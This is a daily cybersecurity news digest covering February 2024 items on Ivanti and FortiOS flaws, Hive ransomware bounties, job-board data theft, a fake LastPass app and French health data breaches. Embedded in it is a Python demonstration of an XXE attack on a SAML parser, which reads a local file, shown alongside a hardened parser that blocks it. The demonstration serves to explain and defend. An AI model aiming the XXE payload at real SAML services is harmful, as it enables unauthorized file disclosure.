Daily Brief


Total articles found: 12669


2024-02-09 05:16:56 theregister NATION STATE ACTIVITY India Advances Digital Currency with Programming and Offline Use
The Reserve Bank of India (RBI) intends to make its digital currency, the e-rupee, programmable and usable offline. The current retail Central Bank Digital Currency (CBDC) pilot, launched in late 2022, supports person-to-person and person-to-merchant transactions. Programmability would let payments be earmarked for specific purposes, improving transparency and control over how funds are spent. Offline functionality is aimed at areas with limited internet connectivity, a significant concern in India's remote and mountainous regions. Future pilot phases will introduce these features gradually, with potential applications in government payments and business expenses. RBI also plans a framework for authenticating digital payment transactions that considers factors beyond SMS-based OTPs. These initiatives are positioned as part of India's broader economic development strategy, which includes enhancing digital infrastructure and payment technologies. India is also considering revising international agreements on taxing digital goods, aiming to gain tariff revenue and improve trade competitiveness.
2024-02-09 04:05:19 theregister CYBERCRIME Cyber Gang Hijacks Job Boards, Pilfers Millions of Emails in Asia
A crime gang tracked as "ResumeLooters" attacked Asian job boards and retailer websites, stealing more than two million personal records. Group-IB, a Singapore-based international cybersecurity company, identified the attacks, which relied mainly on SQL injection and cross-site scripting (XSS) to compromise databases. The stolen data includes email addresses, names, phone numbers, dates of birth, and employment histories; the attacks started in January and continued for at least two months. Although the group also tried to steal administrator credentials, Group-IB found no evidence that it succeeded. Most victims were in the APAC region, with India having the highest number of compromised sites. Penetration testing tools and stolen data were found on a malicious server linked to the group, indicating attempts at deeper network penetration and data theft. Group-IB traced the attackers' activity to two Chinese-language Telegram accounts, suggesting the threat actors may operate from China.
2024-02-09 03:39:40 thehackernews CYBERCRIME Ivanti Issues Alert for High-Severity Authentication Bypass Vulnerability
Ivanti has disclosed a high-severity authentication bypass vulnerability, tracked as CVE-2024-22024, in its gateway products. The flaw has a CVSS score of 8.3 and could allow an attacker to reach certain restricted resources without authentication. Affected products are Ivanti Connect Secure, Policy Secure, and ZTA gateways; the bug is an XML External Entity (XXE) issue in the SAML component. It was identified during an ongoing internal review that has already uncovered several security issues in Ivanti products this year. Ivanti has released patches for the affected versions. The company says it has no evidence of active exploitation but urges customers to update promptly, given the recent abuse of other Ivanti vulnerabilities.
2024-02-09 03:03:43 theregister CYBERCRIME U.S. Offers $15 Million Bounty for Hive Ransomware Gang Leaders
The U.S. government is offering rewards totalling up to $15 million for information on the Hive ransomware gang: up to $10 million for identifying or locating people in key leadership positions, and up to $5 million for information leading to the arrest or conviction of anyone involved in Hive ransomware activity. The FBI, working with international law enforcement, previously disrupted Hive's operations and handed out decryption keys, saving victims about $130 million in ransom payments. The State Department also seeks information on whether Hive members act at the direction or under the control of a foreign government. Despite takedowns, ransomware remains lucrative: attacks collected over $1 billion in cryptocurrency payments last year. Chainalysis credits the Hive operation with a significant share of the decline in ransom payments in 2022, estimating that at least $210.4 million in payments were prevented.
2024-02-09 00:31:12 theregister NATION STATE ACTIVITY FBI Defends Controversial Surveillance Powers Against Reform
The FBI is arguing to keep its warrantless surveillance powers under FISA Section 702, claiming they are essential to counter Chinese hacking. FBI Director Christopher Wray pointed to Section 702's role in pre-emptively warning a US transportation hub of a Chinese intrusion. Privacy advocates and some lawmakers are pushing for reform, arguing that Section 702 enables warrantless surveillance of US citizens and invites abuse. The debate centres on whether to reauthorize Section 702 unchanged or to require warrants for searches involving US persons' data. The FBI contends that a warrant requirement would hamper operations; critics counter that there is little evidence of the authority's cyber value and that privacy protections should come first. Several proposed bills would reform Section 702, adding warrant requirements except in specific national security circumstances. The FBI's recent disruption of a botnet used by the Chinese state group Volt Typhoon, which was carried out with warrants, is cited as evidence that warrantless searches are not necessary. Without significant reform, the Electronic Frontier Foundation and others argue, Section 702 has become an overreaching domestic spying tool and should be allowed to expire.
2024-02-08 23:14:29 bleepingcomputer MALWARE Urgent Warning for Critical RCE Vulnerability in FortiOS SSL VPN
Fortinet has disclosed a critical remote code execution (RCE) vulnerability in FortiOS SSL VPN that it says is potentially already being exploited in the wild. The flaw, tracked as CVE-2024-21762, allows unauthenticated attackers to execute arbitrary code via specially crafted requests. Fortinet rates it 9.6 on the CVSS scale and advises customers to upgrade to a patched version immediately. Where patching is not immediately possible, disabling SSL VPN on the affected FortiOS devices is the recommended workaround; Fortinet's advisory notes that disabling web mode alone is not a valid workaround. Fortinet has not said how the flaw is being exploited or who reported it. Other flaws were disclosed at the same time, including the critical CVE-2024-23113 and two medium-severity CVEs, though none of these are reported as exploited. Fortinet previously disclosed that the Chinese state-sponsored group Volt Typhoon had exploited another set of FortiOS vulnerabilities. Organizations running Fortinet products are urged to prioritize these updates, given the high risk of targeted attacks against these weaknesses.
2024-02-08 22:03:01 theregister CYBERCRIME Rogue LastPass Clone Found in Apple's iOS App Store
A fraudulent LastPass app published under the developer name Parvati Patel was found in the iOS App Store. LastPass' security and legal teams contacted Apple to have the malicious app removed. The fake app imitated the legitimate LastPass service in order to deceive users and potentially steal their data. Despite Apple's approval process and its guidelines against impersonation, the rogue app got past the safeguards, and LastPass is working with Apple to understand how it passed review. The fake app carried obvious signs of fraud, such as misspellings and incorrect developer information, underlining the need for user vigilance. The incident shows the persistent challenge of keeping app stores clean and the importance of scrutinizing app details before downloading.
2024-02-08 20:20:37 bleepingcomputer CYBERCRIME Hyundai Motor Europe Targeted by Black Basta Ransomware Attack
Hyundai Motor Europe has been hit by a ransomware attack attributed to the Black Basta group. When first queried by BleepingComputer, Hyundai reported only "IT issues", later confirming the cyberattack. The company is investigating the unauthorized network access with outside cybersecurity and legal experts. The threat actors claim to have stolen 3 TB of corporate data spanning multiple departments, raising concerns about leaks of sensitive information. Black Basta, linked to the former Conti operation, has been active since April 2022 and is known for double-extortion attacks and substantial ransom revenue. Hyundai previously suffered a data breach in April 2023, and its Hyundai MEA X account was hacked recently. The company says it has notified the relevant authorities and emphasizes its commitment to the security of customers, employees, investors, and partners.
2024-02-08 19:49:41 bleepingcomputer CYBERCRIME Ivanti Announces Urgent Security Flaw in VPN Appliances
A new authentication bypass vulnerability in Ivanti's Connect Secure, Policy Secure, and ZTA gateways requires immediate patching. The flaw, tracked as CVE-2024-22024, stems from an XML External Entity (XXE) weakness in the gateways' SAML component and lets attackers reach restricted resources without user interaction. Ivanti reports no exploitation so far but stresses the need for immediate action. Over 20,000 Internet-exposed Ivanti Connect Secure (ICS) VPN gateways are at risk; compromised devices are being actively tracked, and nearly 250 had been observed compromised as of February 7. Patches for the earlier Connect Secure flaws exploited in January were released on January 31, and Ivanti provided interim mitigation for customers still awaiting updates. Ivanti recommends factory-resetting every vulnerable appliance before patching so that attackers cannot persist through the upgrade. After mass exploitation by multiple threat actors was detected, CISA ordered U.S. federal agencies to disconnect vulnerable Ivanti VPN appliances within 48 hours.
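Both Ivanti items above describe CVE-2024-22024 only as an XXE weakness in the SAML component. The following added example (not Ivanti's code, and not a reproduction of the actual bug) shows the mechanism with Python's standard-library xml.sax: a SAML Response that carries a DOCTYPE declaring an external entity is parsed by a reader that resolves external general entities, and the referenced local file ends up in the NameID value the service provider trusts. The SAML documents, the element names used to pick out the subject, and the "secret" file are all constructed for the example; a real SAML endpoint would be fed the Response over HTTP, and the hardened parser below is one standard defence (refuse any DTD and never resolve external entities), not Ivanti's fix.

```python
"""Added example: XXE against a SAML-style Response, and a hardened parser.

The attacker-controlled Response declares an external entity pointing at a
local file. A SAX reader with external general entities enabled resolves it
and hands the file contents to the application as the subject NameID.
Everything here (documents, secret file, element names) is constructed for
the demonstration; it is not Ivanti's code or the CVE-2024-22024 payload.
"""
import io
import pathlib
import tempfile
import xml.sax
import xml.sax.handler

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
SAMLP_NS = "urn:oasis:names:tc:SAML:2.0:protocol"


def build_xxe_response(target_uri: str) -> bytes:
    """Attacker-controlled Response: the DOCTYPE binds &xxe; to target_uri."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE Response [<!ENTITY xxe SYSTEM "{target_uri}">]>\n'
        f'<samlp:Response xmlns:samlp="{SAMLP_NS}" xmlns:saml="{SAML_NS}">\n'
        "  <saml:Assertion><saml:Subject>\n"
        "    <saml:NameID>&xxe;</saml:NameID>\n"
        "  </saml:Subject></saml:Assertion>\n"
        "</samlp:Response>\n"
    ).encode()


def build_clean_response(subject: str) -> bytes:
    """A benign Response with no DOCTYPE, as an identity provider would send."""
    return (
        '<?xml version="1.0"?>\n'
        f'<samlp:Response xmlns:samlp="{SAMLP_NS}" xmlns:saml="{SAML_NS}">\n'
        "  <saml:Assertion><saml:Subject>\n"
        f"    <saml:NameID>{subject}</saml:NameID>\n"
        "  </saml:Subject></saml:Assertion>\n"
        "</samlp:Response>\n"
    ).encode()


class NameIDCollector(xml.sax.handler.ContentHandler):
    """Collects the text of the NameID element (the asserted subject)."""

    def __init__(self):
        super().__init__()
        self._in_name_id = False
        self.name_id = ""

    def startElement(self, name, attrs):
        if name.endswith("NameID"):
            self._in_name_id = True

    def characters(self, content):
        if self._in_name_id:  # may arrive in several chunks
            self.name_id += content

    def endElement(self, name):
        if name.endswith("NameID"):
            self._in_name_id = False


class RejectDTD:
    """Lexical handler whose startDTD aborts the parse: SAML messages never
    legitimately carry a DOCTYPE, so any DTD is treated as hostile."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DOCTYPE not allowed in SAML message: {name}")

    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass


def parse_name_id(doc: bytes, resolve_external_entities: bool) -> str:
    """Extract NameID. With resolve_external_entities=True this is the
    vulnerable configuration: xml.sax fetches the URI named in the entity
    declaration (file://, http://...) and splices its content into the text."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    handler = NameIDCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc))
    return handler.name_id.strip()


def parse_name_id_hardened(doc: bytes) -> str:
    """Hardened variant: external entities stay off AND any DTD is rejected,
    which also closes the door on entity-expansion (billion laughs) attacks."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setProperty(xml.sax.handler.property_lexical_handler, RejectDTD())
    handler = NameIDCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(doc))
    return handler.name_id.strip()


def demo() -> dict:
    """Run the attack against both parsers; the secret file is constructed."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "session.key"
        secret.write_text("s3cr3t-session-token")  # constructed secret
        xxe_doc = build_xxe_response(secret.as_uri())
        leaked = parse_name_id(xxe_doc, resolve_external_entities=True)
        skipped = parse_name_id(xxe_doc, resolve_external_entities=False)
        try:
            parse_name_id_hardened(xxe_doc)
            hardened_rejected = False
        except ValueError:
            hardened_rejected = True
        clean = parse_name_id_hardened(build_clean_response("alice@example.com"))
    return {"leaked": leaked, "skipped": skipped,
            "hardened_rejected": hardened_rejected, "clean_subject": clean}


if __name__ == "__main__":
    print(demo())
```

The point of the hardened variant is that it fails closed: the vulnerable parser silently returns the file contents as the subject, the external-entities-off parser returns an empty NameID (an attacker probe passes unnoticed), while the DTD-rejecting parser raises on the first DOCTYPE and still parses a normal Response correctly.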
2024-02-08 18:38:11 bleepingcomputer MALWARE Android XLoader Malware Evolves for Auto-Execution
A new variant of the XLoader Android malware runs automatically after installation, with no user interaction. XLoader, attributed to the 'Roaming Mantis' threat actor, targets users worldwide, including in the U.S., U.K., and parts of Europe and Asia. It spreads via SMS messages carrying URLs that lead to a malicious APK, often disguised as the Chrome web browser. McAfee researchers reported the auto-execution technique to Google, which is developing mitigations for future Android versions. Roaming Mantis uses Unicode tricks and app impersonation to persuade users to grant extensive permissions, which are then abused for phishing and theft of sensitive information. The malware delivers custom phishing attacks through notification channels, pulling the phishing text from Pinterest profiles to evade conventional detection. The new variant can execute 20 different commands from its C2 server, indicating a sophisticated and adaptable threat. McAfee advises users to install security products that can detect and remove such threats based on known indicators.
2024-02-08 18:02:02 bleepingcomputer CYBERCRIME U.S. Offers $10M Reward for Intel on Hive Ransomware Leaders
The U.S. State Department is offering up to $10 million for information leading to the identification or location of Hive ransomware leaders. Hive extorted roughly $100 million from more than 1,300 companies in over 80 countries between June 2021 and November 2022. A further reward of up to $5 million is available for information leading to the arrest or conviction of anyone participating in Hive ransomware activity. Rewards of up to $15 million have previously been offered for other ransomware operations such as Clop and Conti. The rewards come from the Transnational Organized Crime Rewards Program, which has paid out more than $135 million for tips since 1986. Law enforcement infiltrated Hive's network in July 2022, helping victims and preventing about $130 million in ransom payments. Agents handed out more than 300 decryption keys and shared intelligence gathered from Hive's communications, malware file hashes, and affiliate information. Hive was known for indiscriminate attacks, including on critical sectors such as healthcare and emergency services.
2024-02-08 17:20:56 theregister MALWARE Raspberry Robin Malware Evolves with Purchased Exploits for Rapid Deployment
Raspberry Robin's operators are suspected of buying exploits so they can attack faster. The group previously used exploits for vulnerabilities up to 12 months old but now uses recently disclosed ones. Check Point Research observed strikingly quick adoption, with some exploits, such as one for CVE-2023-36802, used less than a month after disclosure. Exploits were used before or shortly after public disclosure, and one was identified as a zero-day that had been sold on the dark web. Check Point concludes that the Raspberry Robin team most likely buys exploits from sophisticated developers rather than writing them in-house. The malware has also gained upgraded evasion features, persistence across system shutdowns, and improvements to its communication and lateral movement. Raspberry Robin is linked to major criminal groups and plays a key role in the cybercrime ecosystem, being one of three loaders responsible for 80% of attacks observed in one period of 2023.
2024-02-08 17:05:11 bleepingcomputer CYBERCRIME Fraudulent 'LassPass' Phishing App Detected on Apple App Store
A counterfeit LastPass app named 'LassPass' has been found on the Apple App Store, apparently designed to phish users' credentials. The fake app mimics the genuine LastPass in name, icon, and user interface but is published under the developer name 'Parvati Patel' and has only a handful of reviews, which warn that it is fake. Because LastPass vaults hold highly sensitive data, the fraudulent app poses a significant credential-theft risk. LastPass has posted a warning on its website about the deceptive app, with links to the legitimate app so customers can verify what they install. Despite Apple's app review process, the counterfeit slipped through, raising questions about the efficacy of that review. The same developer has another app on the App Store, which raises the possibility that the developer account was compromised. Users who installed the fake app are advised to uninstall it immediately, change their LastPass master password, and consider resetting every password stored in their vault. At the time of the report, Apple had not responded to inquiries about the fake app, which remained available on the App Store.
2024-02-08 15:48:20 bleepingcomputer DATA BREACH Massive Data Breach Compromises 33 Million Records in France
Two French healthcare payment service providers, Viamedis and Almerys, have suffered significant data breaches affecting more than 33 million people in France, exposing data such as social security numbers and insurance details. Viamedis says no financial information was taken and that bank details, email addresses, and phone numbers were not exposed. Viamedis serves 20 million people through 84 health organizations; the exact number of affected individuals is still under investigation. France's data protection authority, CNIL, confirmed both breaches and warned of an elevated risk of phishing, identity theft, and insurance fraud. CNIL is ensuring that both companies meet their GDPR obligations by directly notifying those affected, and has opened an investigation into the adequacy of their security measures and their GDPR compliance.
2024-02-08 14:06:01 theregister CYBERCRIME Cybersecurity Researchers Charged in $2.5M Apple Fraud Scheme
Two cybersecurity researchers, Noah Roskin-Frazee and Keith Latteri, have been charged with defrauding a company, unnamed in the indictment but apparently Apple, of $2.5 million. They allegedly gained access through a third-party contractor's systems, then ordered gift cards and hardware and sold them to third parties. The pair is accused of abusing a password reset tool to take over accounts, then using those accounts to reach the company's VPN and remote desktops in India and Costa Rica. From there they allegedly manipulated the company's Toolbox ordering system and Jamf MDM platform to place and amend orders, setting product prices to zero. They used transshipment companies to conceal their identities and ship the fraudulently obtained products. Roskin-Frazee had previously been credited by Apple for reporting bugs, underscoring his dual status as a legitimate researcher and alleged criminal. Apple and the defense lawyers did not immediately respond to requests for comment.